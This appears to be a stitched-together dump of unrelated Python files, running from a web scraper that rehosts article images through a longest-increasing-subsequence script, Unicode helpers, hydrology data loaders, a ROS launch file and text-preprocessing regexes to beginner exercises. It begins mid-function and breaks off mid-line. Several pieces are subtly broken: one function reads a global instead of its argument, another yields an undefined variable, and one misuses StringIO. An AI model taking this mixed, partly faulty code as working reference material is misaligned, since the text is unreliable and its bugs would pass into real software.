delfile_from_dir(self,file_path): os.remove(file_path) def mkdirs(self,path): if not os.path.isdir(path): os.makedirs(path) def get_filename(self,url_str): url = urlparse(url_str) i = len(url.path) - 1 while i > 0: if url.path[i] == '/': break i = i - 1 file_name=url.path[i+1:len(url.path)] extension="jpg" if file_name !='': try: extension=file_name.split(".")[1] except: pass return str(uuid4())+"."+extension def upload_file_to_qiniu(self,file_path,file_key): token = q.upload_token(bucket_name, file_key, 3600) ret, info = put_file(token, file_key, file_path) if(info.status_code==200): # self.delfile_from_dir(file_path) print 'upload file finish %s'%file_key def delfile_from_dir(self,file_path): os.remove(file_path) class JianshuSpider(HtmlSpider): def get_jianshu_articles(self,startpage,endpage): while startpage<=endpage: self.getlist(startpage) startpage+=1 def getlist(self,pageindex): url =listurl+str(pageindex) page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') titles = soup.find_all("h4",{"class":"title"}); for title in titles: next = title.next_element href= next.get("href") article_url = baseurl+href self.get_article_detail(article_url) print "finish page=============="+str(pageindex) def get_jianshu_article(self,article_id,user_id=None,forum_id=None): url = article_base_url+str(article_id) self.get_article_detail(url,user_id,forum_id) def get_article_detail(self,url,user_id=None,forum_id=None): page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') article = soup.find("div",{"class":"article"}) title = article.find("h1",{"class":"title"}).text context = article.find("div",{"class":"show-content"}) imgs = context.find_all("img") img_links =[] if len(imgs)>0: for img in imgs: img_url= img.get("src"); if 'githubusercontent.com' in img_url or 'github.com' in img_url: continue filename = self.get_filename(img_url) src =base_img_url+filename img["src"]=src img["data-original-src"]=src self.download_img(img_url,filename) img_links.append(src) brief = context.text[0:200] self.save_article_to_db(title,context.prettify(),brief,img_links,user_id,forum_id) class LcodeSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') article_eml= soup.find("article") title = article_eml.find("h1",{"class":"entry-title"}).text.strip() content_eml = article_eml.find("div",{'class':'entry-content'}) content_eml.find("div",{"class":"ads_page_top"}).decompose() gutters = content_eml.select(".gutter") if len(gutters)>0: for gutter in gutters: gutter.decompose() line_numbers= content_eml.select(".line-numbers") if len(line_numbers)>0: for line in line_numbers: line.decompose() js_scritpts = content_eml.select("script") if len(js_scritpts)>0: for js in js_scritpts: js.decompose() content_eml.find(id="jiathis_style_32x32").parent.decompose() single_pages= content_eml.select(".pull-right.single-pages") if len(single_pages)>0: for sp in single_pages: sp.decompose() ps = content_eml.select("p") for p in ps: string = p.string if '关注我的订阅号' in str(string): siblings=p.find_next_siblings() for sb in siblings: sb.decompose() p.decompose() imgs = content_eml.find_all("img") img_links =[] if len(imgs)>0: for img in imgs: img_url= img.get("data-original"); if img_url==None: img_url = img.get("src") if img_url==None: return if img_url.startswith('data'): continue filename = self.get_filename(img_url) src =base_img_url+filename img["src"]=src img["data-original"]=src img["data-original-src"]=src 
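                    # (added note) the next lines point the enclosing <a> tag and the recorded
                    # image links at the rewritten CDN URL (base_img_url + filename), then
                    # download_img() fetches the original file and re-uploads it to the Qiniu
                    # bucket via upload_file_to_qiniu().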
img.parent["href"]=src self.download_img(img_url,filename) img_links.append(src) brief = content_eml.text[0:200] self.save_article_to_db(title,content_eml.prettify(),brief,img_links,user_id,forum_id) def getlist(self,user_id=None,forum_id=None): url ='http://www.lcode.org/react-native/' page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') content_eml= soup.find("div",{"class":'page-content'}) links = content_eml.find_all("a") for link in links: href = link.get("href") if href=='http://www.lcode.org' or href=='https://github.com/jiangqqlmj/WeixinArticles/blob/master/README.md': continue if href=='https://github.com/Bob1993/React-Native-Gank': break self.get_article_detail(href,user_id,forum_id) class SegmentfaultSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): pass class CSDNSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): pass class ThreadHtmlPareser(HtmlSpider): def __init__(self): self.imgs = [] self.content='' def pasert(self,content): soup =BeautifulSoup(content,'html5lib') js_scritpts = soup.select("script") if len(js_scritpts)>0: for js in js_scritpts: js.decompose() imgs = soup.find_all("img") if len(imgs)>0: for img in imgs: self.imgs.append(img.get('src')) links = soup.find_all("a") if len(links) >0: for link in links: click_evnt = link.get('onclick') if click_evnt is not None: link['onclick']='' self.content = soup.body def show(self,content,show_hide=False): if content==None: return soup =BeautifulSoup(content,'html5lib') if show_hide==False: hides = soup.find_all("hide") for hide in hides: new_tag = soup.new_tag("div") new_tag.string='这里有隐藏内容,回复文章后刷新页面可见' new_tag['class']='attach_nopermission' hide.replace_with(new_tag) result = soup.body return result # Code to find the length of the longest increasing sequence def lis(sn): length_longest = [] for i in range(len(sequence_of_numbers)): length_longest.append(1) for i in range(0, len(sn)): for j in range(0, i ): print('sn[{}] : {} | sn[{}] : {} | ll[{}] : {} | ll[{}]:{}'.format(i,sn[i],j,sn[j],i,length_longest[i],j,length_longest[j] )) if sn[j] < sn[i] and length_longest[j] >= length_longest[i]: length_longest[i] = 1 + length_longest[j] return length_longest def max_lis_length(sequence_of_numbers): return max(lis(sequence_of_numbers)) def main(sequence_of_numbers): print('Max length : {}'.format(max_lis_length(sequence_of_numbers))) if __name__ == '__main__': sequence_of_numbers = [ 3,4,5,1,3,4,9 ] print(sequence_of_numbers) main(sequence_of_numbers) behnam/pycodepoints # # Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. 
# from __future__ import unicode_literals from builtins import chr import sys def is_leading_surrogate(code_unit): return 0xD800 <= code_unit <= 0xDBFF def is_trailing_surrogate(code_unit): return 0xDC00 <= code_unit <= 0xDFFF def decode_surrogate_pair(leading, trailing): return ((leading - 0xD800) << 10) + (trailing - 0xDC00) + 0x10000 def _from_unicode(unistr): return [ord(c) for c in unistr] def _from_utf16(unistr): assert sys.maxunicode == 0xFFFF leading_surrogate = -1 for utf16 in unistr: code_unit = ord(utf16) if leading_surrogate == -1: if is_leading_surrogate(code_unit): leading_surrogate = code_unit else: yield code_unit else: if is_trailing_surrogate(code_unit): # Valid surrogate pair code_point = decode_surrogate_pair(leading_surrogate, code_unit) yield code_point leading_surrogate = -1 else: # Leading surrogate without trailing surrogate yield leading_surrogate if is_leading_surrogate(code_unit): leading_surrogate = code_unit else: yield code_point leading_surrogate = -1 # Dangling surrogate at end of input if leading_surrogate != -1: yield leading_surrogate def _to_utf16(code_points): for code_point in code_points: if code_point <= 0xFFFF: yield chr(code_point) else: base = code_point - 0x10000 high_surrogate = (base >> 10) + 0xD800 low_surrogate = (base & 0x3FF) + 0xDC00 yield chr(high_surrogate) yield chr(low_surrogate) def _to_chars(code_points): return [chr(cp) for cp in code_points] if sys.maxunicode == 0xFFFF: from_unicode = _from_utf16 to_chars = _to_utf16 else: assert sys.maxunicode == 0x10FFFF from_unicode = _from_unicode to_chars = _to_chars def to_unicode(code_points): return u''.join(to_chars(code_points)) from flask import Flask from flask_restful import Api from config import app_config from .orders import OrderDetals, NewOrderPlacement, DisplayAllOrders def create_app(config_stage): app = Flask(__name__) app.config.from_object(app_config[config_stage]) api = Api(app) api.add_resource(OrderDetals, '/api/v1/orders/') api.add_resource(NewOrderPlacement, '/api/v1/orders') api.add_resource(DisplayAllOrders, '/api/v1/orders') return app 0 import os import tensorflow as tf from tensorflow.keras import backend as K from tensorflow.keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, Dropout, Dense, Activation from tensorflow.keras.models import Sequential from tensorflow.keras.optimizers import Adam from tensorflow.keras.applications import imagenet_utils from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping from lesion_classifier import LesionClassifier from base_model_param import BaseModelParam class VanillaClassifier(LesionClassifier): """ NOT IMPLEMENTED!!! Model trained from scratch for skin lesion classification """ @property def model(self): return self._model @property def model_name(self): return self._model_name @staticmethod def preprocess_input(x, **kwargs): """Preprocesses a numpy array encoding a batch of images. # Arguments x: a 4D numpy array consists of RGB values within [0, 255]. # Returns Preprocessed array. 
""" return imagenet_utils.preprocess_input(x, mode='tf', **kwargs)1-10 # uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: otp.speedchat.SpeedChatGlobals from SCTerminal import SCTerminalSelectedEvent from SCTerminal import SCTerminalLinkedEmoteEvent from SCStaticTextTerminal import SCStaticTextMsgEvent from SCGMTextTerminal import SCGMTextMsgEvent from SCCustomTerminal import SCCustomMsgEvent from SCEmoteTerminal import SCEmoteMsgEvent, SCEmoteNoAccessEventhydropy/reading_third_party_data.py # -*- coding: utf-8 -*- """ Reading data from external sources , , """ from __future__ import absolute_import, print_function import os import sys import ftplib from io import StringIO import datetime import numpy as np import pandas as pd import requests from . import exceptions def load_VMM_zrx_timeserie(filename): """ Read VMM zrx files and converts it into a pd.DataFrame Parameters ---------- filename : str full path name to the file to read in Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ zrxf = open(filename, 'r') # define header length (= number of lines with starting #) ctestall = zrxf headerlength = 0 ctest = '#' while ctest == '#': ctest = ctestall.readline()[0] headerlength += 1 print('File ', filename.split("\\")[-1], ' headerlength is: ', headerlength-1) zrxf.close() # Read the data data = pd.read_table(filename, sep=' ', skiprows=headerlength-1, index_col=0, parse_dates=True, header=None, usecols=(0, 1), names=['Time', filename.split("\\")[-1][:-4]], na_values='-777.0') return data def _gettext(ftp, filename, outfile=None): """ Help function for scraping text from the ftp-driver (for binary data, another format would be needed) """ # fetch a text file if outfile is None: outfile = sys.stdout # use a lambda to add newlines to the lines read from the server ftp.retrlines("RETR " + filename, lambda s, w=outfile.write: w(s+"\n")) def load_VMM_zrx_timeseries_from_ftp(server, login, password, path, dataname="_DATA"): """ Read all VMM zrx files in a specific folder, concatenates them and converts it into a pd.DataFrame Parameters ---------- server : str ftp server location, e.g. 
ftp.anteagroup.be login : str login name of the ftp drive password : str password of the user path : str path name to the folder with the interested .zrx files dataname : str suffix name used to flag the saved data Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ ftp = ftplib.FTP(server) ftp.login(login, password) # discharge -> go to discharge folder ftp.cwd(path) # check the files in the folder files = ftp.nlst() # We're interested in the .zrx files, so let's get the information of # those in a dictionary, with the key the station code and the data a # pandas Dataframe first exclude in the files list the none-zrx files files = [zrxf for zrxf in files if '.zrx' in zrxf] data = [] for zrxf in files: output = StringIO.StringIO() _gettext(ftp, zrxf, output) # define header length (= number of lines with starting #) ctestall = StringIO.StringIO(output.getvalue()) headerlength = 0 ctest = '#' while ctest == '#': ctest = ctestall.readline()[0] headerlength += 1 print('File ', zrxf, ' headerlength is: ', headerlength-1) temp = pd.read_table(StringIO.StringIO(output.getvalue()), sep=' ', skiprows=headerlength-1, index_col=0, parse_dates=True, header=None, usecols=(0, 1), names=['Time', zrxf[:-4]], na_values='-777.0') data.append(temp) output.close() ftp.close() # CONCATENATE THE DIFFERENT DATAFRAMES IN ONE BIG: data2 = pd.concat(data, axis=1) # SAVE THE DATA IN ONE PICKLE FOR NEXT TIME WORKING WITH THESE data2.to_csv(datetime.datetime.now().strftime("%Y%m%d") + "VMM_" + dataname+".csv", float_format="%.3f", na_rep="Nan") data2.to_pickle(datetime.datetime.now().strftime("%Y%m%d") + "VMM_" + dataname) def _minutes2hours(minutes): """convert minutes to hours and return als rest """ return minutes/60, minutes % 60 def load_CEH_timeserie(filename): """ Read VMM zrx files and converts it into a pd.DataFrame Parameters ---------- filename : str full path name to the file to read in Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ parse = lambda y,m,d,h: datetime.datetime(int(y), int(m), int(d), _minutes2hours(int(h))[0], _minutes2hours(int(h))[1]) ceh_data = pd.read_csv(filename, sep=',', parse_dates={"Datetime": [1, 2, 3, 4]}, date_parser=parse, skipinitialspace=True) ceh_data = ceh_data.set_index("Datetime") return ceh_data def get_usgs(site, service, start_date, end_date): """Request stream gauge data from the USGS NWIS. Args: site (str): a valid site is 01585200 service (str): can either be 'iv' or 'dv' for instantaneous or daily data. iv data are instantaneous values usually recorded every 15 minutes; units are expressed as cubic feet/second. dv data are daily mean discharges expressed as cubic feet/second. start_date (str): should take on the form yyyy-mm-dd end_date (str): should take on the form yyyy-mm-dd Returns: A Pandas dataframe object. Raises: ConnectionError due to connection problems like refused connection or DNS Error. HydroNoDataError when the request is valid, but NWIS has no data for the parameters provided in the request. Example:: >>> from hydropy import hydropy as hp >>> my_df = hp.get_usgs('01585200', 'dv', '2012-06-01', '2012-06-05') >>> my_df value datetime 2012-06-01 97.00 2012-06-02 5.80 2012-06-03 1.70 2012-06-04 1.40 2012-06-05 0.96 """ response_obj = request_nwis(site, service, start_date, end_date) nwis_df = extract_nwis_df(response_obj) return nwis_df def request_nwis(site, service, start_date, end_date): """Request stream gauge data from the USGS NWIS. 
Args: site (str): a valid site is 01585200 service (str): can either be 'iv' or 'dv' for instantaneous or daily data. start_date (str): should take on the form yyyy-mm-dd end_date (str): should take on the form yyyy-mm-dd Returns: a response object. * response.url: the url we requested data from. * response.status_code: * response.json: the content translated as json * response.ok: "True" when we get a '200' Raises: ConnectionError due to connection problems like refused connection or DNS Error. Example:: >>> import hydropy as hp >>> # this requests: http://waterservices.usgs.gov/nwis/dv/?format=json,1.1&sites=01585200&startDT=2012-06-01&endDT=2012-06-05 >>> response = hp.get_nwis('01585200', 'dv', '2012-06-01', '2012-06-05') >>> response >>> response.ok True >>> response.json() *JSON ensues* The specification for this service is located here: http://waterservices.usgs.gov/rest/IV-Service.html """ header = { 'Accept-encoding': 'gzip', 'max-age': '120' } values = { 'format': 'json,1.1', 'sites': site, 'parameterCd': '00060', # represents stream discharge. # 'period': 'P10D' # This is the format for requesting data for a period before today 'startDT': start_date, 'endDT': end_date } url = 'http://waterservices.usgs.gov/nwis/' url = url + service + '/?' response = requests.get(url, params=values, headers=header) # requests will raise a 'ConnectionError' if the connection is refused # or if we are disconnected from the internet. # I think that is appropriate, so I don't want to handle this error. # TODO: where should all unhelpful ('404' etc) responses be handled? return response def extract_nwis_df(response_obj): """Returns a Pandas dataframe from an NWIS response object. Returns: a pandas dataframe. Raises: HydroNoDataError when the request is valid, but NWIS has no data for the parameters provided in the request. """ nwis_dict = response_obj.json() # strip header and all metadata. ts = nwis_dict['value']['timeSeries'] if ts == []: # raise a HydroNoDataError if NWIS returns an empty set. # # Ideally, an empty set exception would be raised when the request # is first returned, but I do it here so that the data doesn't get # extracted twice. # TODO: raise this exception earlier?? # # ** Interactive sessions should have an error raised. # # **Automated systems should catch these errors and deal with them. # In this case, if NWIS returns an empty set, then the request # needs to be reconsidered. The request was valid somehow, but # there is no data being collected. # TODO: this if clause needs to be tested. 
raise exceptions.HydroNoDataError("The NWIS reports that it does not" " have any data for this request.") data = nwis_dict['value']['timeSeries'][0]['values'][0]['value'] # print("inside extract_nwis_df") # print(data) DF = pd.DataFrame(data, columns=['dateTime', 'value']) DF.index = pd.to_datetime(DF.pop('dateTime')) DF.value = DF.value.astype(float) # DF.index.name = None DF.index.name = 'datetime' # this is never tested DF.replace(to_replace='-999999', value=np.nan, inplace=True) return DFdeepracing_rclcpp/launch/utilities.launch.py """Launch the cpp_code executable in this package""" import os import launch_ros.actions from launch import LaunchDescription from launch.actions import DeclareLaunchArgument from launch.substitutions import LaunchConfiguration, Command from ament_index_python.packages import get_package_share_directory def generate_launch_description(): config_dir = os.path.join(get_package_share_directory("deepracing_rclcpp"),"config") config_file = DeclareLaunchArgument("config_file", default_value=os.path.join(config_dir, "tf_updater.yaml")) entries = [config_file] entries.append(launch_ros.actions.Node(package='deepracing_rclcpp', name='f1_boundary_publisher', executable='boundary_publisher', output='screen', parameters=[{"track_search_dirs": os.getenv("F1_TRACK_DIRS","").split(os.pathsep)}], remappings=[("motion_data", "/f1_game/motion_data"), ("session_data", "/f1_game/session_data")])) entries.append(launch_ros.actions.Node(package='deepracing_rclcpp', name='f1_tf_updater', executable='tf_updater', output='screen', parameters=[LaunchConfiguration(config_file.name)], remappings=[("motion_data", "/f1_game/motion_data"), ("session_data", "/f1_game/session_data")])) return LaunchDescription(entries)preprocessing/preprocess_util.py import re import string import unicodedata from abc import abstractmethod from operator import itemgetter # # Regex patterns # from inputoutput.readers import InputReader re_whitespace = re.compile('\s+') re_html = re.compile(r'<[^>]+>') re_unicode_decimal = re.compile(r'&#(\d{2,4});|&([a-z]+);') re_unicode = re.compile(r'[^\x00-\x7f]') re_html_a_tag = re.compile(r']*>(.+)', flags=re.IGNORECASE) re_next_word = re.compile(r'\s*(\w+)(…|[.][.][.])?') re_non_alpha = re.compile(r'\W+') CURRENCY_PATTERN = r'[$€](\d+(?:[,]\d+)*(?:[.]\d+)?)' re_currency = re.compile(r'(?:^|\s+)' + CURRENCY_PATTERN + r'(?:$|\s+)') re_currency = re.compile(CURRENCY_PATTERN) re_quotations = re.compile(r'"\s*([^"]+)[.]?\s*"') re_quotations_somewhere = re.compile(r'.*"\s*([^"]+)[.]?\s*".*') re_quotations_somewhere_single = re.compile(r".*'\s*([^']+)[.]?\s*'.*") re_quotations_somewhere_slashes = re.compile(r".*/\s*([^/]+)[.]?\s*/.*") re_title_2 = re.compile(r"\s*=\s*'([^']+)';?.*") re_url_wp_date = re.compile(r'.*/wp/\d\d\d\d/\d\d/\d\d/([^/]*)/.*') re_url_stripes = re.compile(r'/(\w+-?-\w+-?-\w+(?:-?-\w+)+)') re_url_stripes_no_id = re.compile(r'(\w+(?:-?-[0-9a-zA-Z]+)+)-\d+') # # Manual replacement # drop_punctuation = [',', '.', '#', '@', '[', ']', '{', '}', '"', ':', '!', "'", '?', '\\'] replace_html_entities = ( ('&', 'and'), ('>', '>'), ('<', '<'), ('“', "'"), ('”', "'"), ('"', "'"), (r"\\'", "'"), (r"\'", "'"), ("`", "'"), ) replace_abbreviations = ( ("ain't", 'are not'), ("can't", 'cannot'), (" he's", ' he is'), (" she's", ' she is'), (" we're", ' we are'), ("we're", 'we are'), (" w/", ' with'), ) # # Helper functions # def re_currency_matches(string): amounts = [] factor = 1 prev_word = None for m in re_currency.finditer(string): amount = ''.join(m.groups('')) try: 
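            # (added note) thousands separators are stripped before conversion, so an
            # assumed match like "$1,200.50" yields the float 1200.5; amounts that still
            # fail to parse fall through to the ValueError branch below and are skipped.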
amount = float(amount.replace(',', '')) except ValueError: print("Strange amount found: %s" % amount) continue next_word_match = re_next_word.search(string, m.end()) if next_word_match: nxt = next_word_match.group(1).lower() cutoff = next_word_match.group(2) is not None if cutoff: pass elif nxt == 'k' or nxt == 'g' or nxt == 'grand': factor = 1000 elif nxt == 'm' or nxt == 'mm' or nxt == 'mil' or nxt == 'mill' or nxt == 'milion' or nxt == 'million': factor = 1000000 elif nxt == 'b' or nxt == 'bil' or nxt == 'bill' or nxt == 'bilion' or nxt == 'billion': factor = 1000000000 elif nxt == 't' or nxt == 'tril' or nxt == 'trill' or nxt == 'trilion' or nxt == 'trillion': factor = 1000000000000 elif nxt == 'bn': pass if prev_word: if prev_word.isdigit(): amounts[-1] *= factor amount *= factor prev_word = nxt else: prev_word = None amounts.append(amount) return amounts def re_date_matches(text): pass def remove_by_indices(s, entities): """ remove hashtags, mentions, urls, symbols (stripped_text) :param s: :param entities: array of dict with 'indices' key :return: s - all entities """ index_offset = 0 strip_indices = [] for type, enities in entities.items(): for enitiy in enities: strip_indices.append((enitiy['indices'][0], enitiy['indices'][1],)) strip_indices.sort(key=itemgetter(0)) for (index_start, index_end) in strip_indices: s = s[:index_start - index_offset] + s[index_end - index_offset:] index_offset += index_end - index_start return s def replace_in_string(s, replace_pairs): """ :param s: :param replace_pairs: :return: new string, the difference in characters, number of replacement operations """ n = len(s) hits = 0 for (find, replace) in replace_pairs: i = 0 while True: i = s.find(find, i) if i == -1: break s = s[0:i] + replace + s[i + len(find):] hits += 1 if hits > n: raise Exception("Livelock") return s, n - len(s), hits def remove_strings(s, remove_substrings): """ :param s: :param remove_substrings: :return: new string, the difference in characters, number of replacement operations """ n = len(s) hits = 0 for find in remove_substrings: i = 0 while True: i = s.find(find, i) if i == -1: break s = s[0:i] + s[i + len(find):] hits += 1 return s, n - len(s), hits def remove_unicode(s): n = len(s) s = unicodedata.normalize('NFKD', s) s = s.encode('ascii', 'ignore') s = s.decode('latin-1') n -= len(s) return s, n def replace_whitespaces(s): s = s.strip() s = re_whitespace.sub(' ', s) return s def remove_unprintable(s): n = len(s) s = ''.join(filter(lambda x: x in string.printable, s)) n -= len(s) return s, n def replace_nonalpha_in_string(s, repl=' '): return re_non_alpha.sub(repl, s) class MultiProcessor: """ Helper class to read and write large files. 
And also parse the users """ def __init__(self, reader: InputReader, writers): """ :param reader: :param writers: list of writers """ self.reader = reader assert len(writers) > 0 self.writers = writers def __call__(self, n=None): """ :param n: number of input items to parse """ for raw_data_element in self.reader: try: self.process(raw_data_element) except Exception as e: print("Warning: could not process %s:%d %s" % (self.reader.current_file, self.reader.i, e)) print(" data: %s" % raw_data_element) output_array = None if n is not None and self.reader.i == n: break self.done() @abstractmethod def process(self, raw_data): """ :param raw_data: :return: None """ pass def processed_obj(self, i, obj): """ :param i: index of writer to use :param obj: obj that is processed :return: """ self.writers[i].write(obj) def done(self): for w in self.writers: w.close() print("Done processing %d to %s" % (self.reader.i, [w.i for w in self.writers])) 0 # ** OOD detection using 1-sample typicality test (Nalisnick et al,2019; Morningstar et al,2020) import pickle import numpy as np import matplotlib.pyplot as plt import eval # Loading loglikelihoods from file def load_datall(resfile,dataind): #resfile: file path #dataind: indices of the samples whose LL should be loaded indic = pickle.load(open(resfile, 'rb')) features=indic['data']['LL'][dataind[0]:dataind[1]] features = np.array(features).transpose() return features # Obtaining the operating curve of the OOD classifier, which here means the confusion matrix (true/false positive/negatives) at a number of different threshold values (positive=OOD). # The thresholds are chosen uniformly over the range [min_score,max_score] where the min and max scores are the likelihood deviation scores over all of the data (both in and out of distributions). # The score is the absolute difference of likelihood with mean of training data likelihoods (higher score means more OOD). 
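# Worked toy example of the score described above (assumed numbers, added only for
# illustration): with training log-likelihoods [-95, -100, -105] the mean is -100, so
# test log-likelihoods of -98 and -160 give scores |-98 - (-100)| = 2 and
# |-160 - (-100)| = 60. Sweeping a threshold over [2, 60] then trades off how many
# in-distribution samples (low scores) are wrongly flagged as OOD against how many
# genuinely OOD samples (high scores) are caught.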
def Opcurve(x_train,x_in,x_out,ndivs): # x_train: log-likelihoods corresponding to training samples # x_in,x_out: log-likelihoods corresponding to in-distribution and OOD test samples # ndivs: number of threshold values to compute the measures at n_in=x_in.shape[0] n_out=x_out.shape[0] meanll=x_train.mean() lldif_in=np.abs(x_in-meanll) lldif_out = np.abs(x_out - meanll) maxs = max(lldif_in.max(), lldif_out.max()) mins = min(lldif_in.min(), lldif_out.min()) thres = np.linspace(mins, maxs, ndivs) truepos=[] falsepos=[] trueneg=[] falseneg=[] for th in thres: c1 = np.sum(lldif_in > th) c2 = np.sum(lldif_out > th) truepos.append(float(c2)) falsepos.append(float(c1)) trueneg.append(float(n_in-c1)) falseneg.append(float(n_out-c2)) rdic={'TP':truepos,'FP':falsepos,'TN':trueneg,'FN':falseneg,'N_in(neg)':n_in,'N_out(pos)':n_out,'Threshs':thres} return rdic # Running the main OOD detection algorithm, and obtaining the evaluation measures and plots on a set of dataset pairs def RunOOD(indis_file,testout_files,ntrain,showplot=False): #indis_file: name of the file containing the statistics on in-distribution data #testout_files: list of names of the files containing the statistics on OOD data #ntrain: number of the in-distribution samples used to train the classifier (others are used for test) based='savedcomps/' #base file path cpoints=200 #number of points on the ROC and PR curves print("*OOD using 1sample Typicality Test") x_train = load_datall(based+indis_file+".sts", (0, ntrain)) fdic = pickle.load(open(based+indis_file+".sts", 'rb')) trainame=fdic['info']['model_trained_data'] print("training file:",indis_file) resdic = dict() resdic['trainfile'] = indis_file resdic['trainsize'] = x_train.shape resdic['method']='llthre' resdic['outfiles']=testout_files resdic['opcurves']=[] x_test_in = load_datall(based+indis_file+".sts", (ntrain, 2*ntrain)) print("training shape:", x_train.shape, "test shape:", x_test_in.shape) for fout in testout_files: x_test_out = load_datall(based + fout+".sts", (0, ntrain)) fdic = pickle.load(open(based + fout+".sts", 'rb')) print("\nOOD set:", fdic['info']['evaldata']) if not fdic['info']['model_trained_data']==trainame: print("Warning: mismatch with in-distribution") oc = Opcurve(x_train,x_test_in,x_test_out, cpoints) tit=trainame + " on " + fdic['info']['evaldata'] auroc, roc = eval.ComputeROC(oc, showplot,tit) auprc,_=eval.ComputePRC(oc, showplot,tit) ftp=eval.ComputeFP95TP(roc) print('AUROC=',auroc) print("AUPRC=",auprc) print("FPR@95%TPR",ftp) resdic['opcurves'].append(oc) print("\n") return resdic #example if __name__ == "__main__": RunOOD('mnist_on_mnist_ires',['mnist_on_fashion_ires','mnist_on_uninoise_ires','mnist_on_flipv_ires','mnist_on_fliph_ires'],3000,False) whoophee/DCP # Given a 2-D matrix representing an image, a location of a pixel in the screen # and a color C, replace the color of the given pixel and all adjacent same colored # pixels with C. # For example, given the following matrix, and location pixel of (2, 2), and 'G' # for green: # B B W # W W W # W W W # B B B # Becomes # B B G # G G G # G G G # B B B #### def adjacent_coords(coord, m, n): ret = [] x, y = coord ret += [(x-1, y)] if x-1 >= 0 else [] ret += [(x, y-1)] if y-1 >= 0 else [] ret += [(x+1, y)] if x+1 < m else [] ret += [(x, y+1)] if y+1 < n else [] return ret def recolor(mat, loc, new_colour): m = len(mat) n = len(mat[0]) colour = mat[loc[0]][loc[1]] st = [loc] visited = set() # BFS using adjacent coordinates. 
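    # (added note) the list ``st`` is used as a FIFO queue via pop(0), which is O(n)
    # per dequeue; collections.deque with popleft() would be the usual constant-time
    # choice, but a plain list keeps this example minimal.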
while st: cur = st.pop(0) # if already visited, ignore if cur in visited: continue # recolour and mark as visited mat[cur[0]][cur[1]] = new_colour visited.add(cur) for x, y in adjacent_coords(cur, m, n): if mat[x][y] == colour: st.append((x, y)) #### def disp(a): print() for x in a: print(' '.join(x)) a = [['B', 'B', 'W'], ['W', 'W', 'W'], ['W', 'W', 'W'], ['B', 'B', 'B']] disp(a) recolor(a, (2, 2), 'G') disp(a) tests/tcustommodulename.py1000+ # The _mycustommodulename module is built from custommodulename.nim file import _mycustommodulename assert(_mycustommodulename.hello() == 5) assert(_mycustommodulename.__doc__ == """This is the doc for my module""") # -------------------------------------------- print("Learn Python to be great!") # -------------------------------------------- print('We learn Python!') # -------------------------------------------- print("Alice's Adventures in Wonderland") # -------------------------------------------- print("2 + 2 = 4") # -------------------------------------------- result = ["O X X", "O X O", "X O X"] print(*result, sep="\n") # -------------------------------------------- print("first\nsecond\nthird") # -------------------------------------------- print("* * * *") print("* *\n" * 2 + "* * * *") # -------------------------------------------- # prints "ok" without quotes print('ok') # -------------------------------------------- # print(1 + 2 + 3 + 6) print(1 + 3 + 3) # print(1 + 2 + 3) # -------------------------------------------- print(10) # -------------------------------------------- for i in range(1, 11): print(i, end=' ') # -------------------------------------------- print(type('int')) print(type(394)) print(type(2.71)) # -------------------------------------------- print("""' '"' '"'"' '"'"'"'""") # -------------------------------------------- print('"""\nTHIS IS A STRING\n"""') # -------------------------------------------- print("""Did that stop the old Grinch? No! 
The Grinch simply said, "If I can't find a reindeer, I'll make one instead!\"""") # -------------------------------------------- number = 1 * 1 * 10 ** 1 # -------------------------------------------- holiday = 'Cinnamon Roll Day' # -------------------------------------------- print(1234567890 * 987654321 + 67890) # -------------------------------------------- a = int(input()) b = int(input()) c = int(input()) r = a * b - c print(r) # -------------------------------------------- n = int(input()) r = n r += n r *= n r -= n r //= n print(r) # -------------------------------------------- word = input() print(word * 2) # -------------------------------------------- n = 12345 print(str(n) * 100) # -------------------------------------------- http_response = 'mocked response' http_error = 404 # -------------------------------------------- str_ = "Hello" str_ = str_ + str(10) # -------------------------------------------- str_ = "Hello" str_ = str_ + str(10) # -------------------------------------------- favfl = {'Alex': 'field flowers', 'Kate': 'daffodil', 'Eva': 'artichoke flower', 'Daniel': 'tulip', 'Alice': 'orchid'} print(favfl) # -------------------------------------------- name = ['Helen'] print(name) # -------------------------------------------- list_ = list(input()) print(list_) # -------------------------------------------- jack_age = int(input()) alex_age = int(input()) lana_age = int(input()) ages = [jack_age, alex_age, lana_age] print(min(ages)) # -------------------------------------------- x = int(input()) y = int(input()) print(min(x, y)) # -------------------------------------------- word1 = input() word2 = input() words = [word1, word2] len_words = list(map(len, words)) print(max(len_words)) # -------------------------------------------- def get_sum(a, b): return a + b # -------------------------------------------- def closest_mod_5(x): mod = x % 5 if mod == 0: return x return x + (5 - x % 5) # -------------------------------------------- def captain_adder(name): print('captain', name) # -------------------------------------------- user_city = "Istanbul" def change_city(new_user_city): global user_city user_city = new_user_city change_city("Paris") print(user_city) # -------------------------------------------- x, y, z = [int(x) for x in [input(), input(), input()]] print(x + y + z) # -------------------------------------------- a, b = [int(input()) for i in range(2)] print(a - b) # -------------------------------------------- n = int(input()) word = input() print(n * word) # -------------------------------------------- n, k = (int(input()) for i in range(2)) k //= n print(k) # -------------------------------------------- n = list(input()) for i in enumerate(n): n[i[0]] = int(i[1]) print(sum(n)) # -------------------------------------------- n = [int(input()) for i in range(3)] print(sum((i // 2 + i % 2) for i in n)) # -------------------------------------------- a = int(input().strip()) print(a > 0) # -------------------------------------------- n, k, v = (int(input()) for i in range(3)) tk = n * k print(v <= tk) # -------------------------------------------- A, B = (int(input()) for i in range(2)) odd = A / B odd = not odd % 2 == 0 print(odd) # -------------------------------------------- word = input() n = len(word) print(f'{word} has {n} letters') # -------------------------------------------- income = int(input()) if 0 <= income <= 15527: percent = 